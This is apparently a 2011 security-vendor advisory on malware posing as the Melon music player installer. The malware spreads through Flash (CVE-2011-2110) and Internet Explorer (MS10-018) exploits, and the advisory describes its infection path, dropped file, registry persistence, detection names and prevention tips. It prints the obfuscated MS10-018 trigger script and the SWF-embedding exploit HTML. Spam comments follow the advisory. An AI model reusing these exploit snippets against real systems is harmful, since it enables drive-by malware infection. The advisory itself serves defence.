12345

6/30/2011

[Warning] A malicious file masqueraded as a Melon player is spreading.

1. Introduction

Recently, malicious file spreading technique using Flash player’s vulnerability trying to download or execute additional malicious file is prevalent.
In case of being infected with this malicious file, various malicious behaviors can be performed in user’s computer unconsciously.
Therefore, user needs special attention about prevalent malicious file to avoid it.



2. Spreading path and symptoms of infection

Masqueraded as a Korean famous music service player, malicious file can be downloaded and installed user’s PC by malicious SWF file using Flash Player Vulnerability (CVE-2011-2110).

The initial spread has begun with inserted Script file such as following URL. And it will perform additionally after checking the version of Internet Explorer and Adobe Flash Player Version.

* Malicious Script for spreading Melon Player’s malicious

- http://(omit)/share/a1.html

* Html, SWF files included malicious Script

This following figure is internal code of a1.html and shows routine about checking version of IE and Flash Player Version and executing SWF file matching.


The following URL is the list to download additional malicious script files.

* Additional malicious Script file downloadable URL list

- http://(~~)/share/a1.html
- http://(~~)/share/a2.html (MS10-018 vulnerability)
- http://(~~)/share/a3.html (CVE-2011-2110 vulnerability)

a2.html and a3.html files are containing code, which is using MS10-018 vulnerability and CVE-2011-2110 vulnerability by each.


* Vulnerability of MS10-018 (a2.html)



function sclick()
{
var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(zmaqwekjsax);
try
{
for (i=0;i<10;i++)
{
zmaqwekjsax.setAttribute('s',window);
}
}
catch(e)
{}
window.status+='';
}

* Vulnerability of CVE-2011-2110 (a3.html)



<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
<param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />
<!--[if !IE]>-->
<object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(~~)B7394" width="550" height="400">
<param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />


This following figure shows internal code of SWF file including malicious code which can be executable by malicious Script. In addition, it shows Shellcode information (Load library, download malicious file disguised as Melon Player) and decoded screen.



* Adobe Flash Player latest security patch
http://www.adobe.com/go/getflash

* Malicious file masqueraded as Melon Player 3.0

Finally, malicious script and SWF file using vulnerability will download "fatt.txt" file. At a glance, it looks like .TXT file. But after decoding process, it will be converted .EXE file to have an ability to infect..

The following image shows the comparison of preference between masqueraded malicious file and normal Melon Player 3.0’s installation file.
 

Original Melon Player’s installation file has the file name “MelonSetup", which is integrated installation file, therefore it doesn’t contain version information.

If being infected with decoded “fatt.txt”, it will make its clone and try to add register by itself.
  
* Generated file
- C:\WINDOWS\winntp\cr.exe (239,108 bytes)

* Register registry value- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Name : HKLM
- Data : "C:\WINDOWS\winntp\cr.exe"

In addition, if this file is executed, it can perform sending collected information, downloading additional malicious file or working as a backdoor in case of maintaining session connecting status continuously such as following figure.
  

3. How to prevent

As above, in this kind of spreading malicious file for stealing online game account, its various variants are emerging and identified. It spreads itself via famous and various social-commerce sites, therefore; the range of infected can be widened considerably and, a huge financial loss, damage can be followed.

Especially, it's hard to detect being infected or not for general user because this kind of malicious files spread unconsciously. To keep safe from this kind of spreading malicious files that we recommend following tips "Security management tips" for general users.
  
Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment function with nProtect Mobile for Android for mobile such as malicious file stated above and runs responding system against various security threats.

Diagnosis name

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
- Trojan/W32.Buzus.239108
 

11 comments:

  1. If you are ready to become a professional writer, you should practice your writing every day. You may write precis using these advices and I'm sure it will work)

    ReplyDelete
  2. As a lawyer with an attention on food contamination cases, Bill Marler has been keeping away from cut natural product for quite a while. Marler has won more than $600 million for customers in foodborne-ailment cases, and all the while.

    ReplyDelete
  3. All Assignment Help offers Global Assignment Help services in UK at reasonable price so that students can gain top grades in their University.

    ReplyDelete
  4. Through our experts, we offer all kinds of Best Custom Essay Writing Services and Custom Essay Writing Services to suit the need of every student.

    ReplyDelete
  5. Thanks for your blog sharing! The information you share is very useful to me and many people are looking for just like me! Thank you again.
    Best Law Assignment Help
    Make My Marketing Plan Assignment

    ReplyDelete
  6. This is what I was wondering for! Nice information. Keep it up This Article is Worth of sharing. The information is helpful for sure! Keep going like this!
    Linux Web Hosting

    ReplyDelete
  7. Apparently, this blog is awesome. I like the given information. Keep Updating…
    Sophisticated describe the information. The information is real true. I am happy to go through your page. Keep Writing…
    Cheap Web Hosting

    ReplyDelete
  8. Online sociology essay writing services have come up with Sociology Assignment Writing Services for sociology coursework writing service students in order for them to score straight A’s in their custom sociology research paper services.

    ReplyDelete
  9. Task Help UK is one of the most captivating areas all things considered google web. It serves the genuine course of action that they ensure in the rule site.
    Pay someone to do homework
    help best essay writer

    ReplyDelete